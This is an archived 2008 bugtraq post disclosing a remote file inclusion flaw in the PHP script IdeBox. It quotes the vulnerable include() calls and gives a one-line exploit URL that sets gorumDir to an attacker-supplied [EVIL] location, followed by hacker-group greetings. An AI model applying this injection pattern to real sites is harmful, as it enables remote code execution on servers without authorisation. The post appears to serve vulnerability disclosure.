bugtraq June 2008 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: IdeBox (include) Remote File Inclusion Vulnerability

IdeBox (include) Remote File Inclusion Vulnerability

From: Ghost hacker <ghost-r00t_at_nospam>
Date: Wed Jun 25 2008 - 12:17:38 GMT
To: <bugtraq@securityfocus.com>

##############################################################  IdeBox (include) Remote File Inclusion Vulnerability ##############################################################
[~] Found : Ghost Hacker
[~] Home page : www.Real-Hack.net
[~] Email : Ghost-r00t@Hotmail.com
[~] Script : IdeBox
[~] Download Script : http://ideabox.phpoutsourcing.com/ideabox_1_1.tgz
=========================== [ Viva IslaM ] ========================== Error ( include.php ) : include("$gorumDir/generformlib_date.php"); include("$gorumDir/notification.php"); include("$gorumDir/zmail.php"); include("$ideaDir/user.php"); include("$ideaDir/globalsettings.php"); include("$ideaDir/init.php"); include("$ideaDir/idea.php"); include("$ideaDir/history.php"); include("$ideaDir/cord.php");

Exploit :
http://xxxx/[Path]/include.php?gorumDir=[EVIL] =========================== [ Viva IslaM ] ==========================
[~] Gootz :

PROTO & QaTaR BoeZ TeaM & x.CJP.x & v4 TeaM & Aseg-Rabe7 & Mr.JUVE Mr.hope & Mr.MoSoS & $eLe & MR.SQL & .. [ gh0st10.wordpress.com ] .. All Member Real Hack And All My Friends :) ##############################################################  Found By Ghost Hacker & My TeaM R-H ############################################################## _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/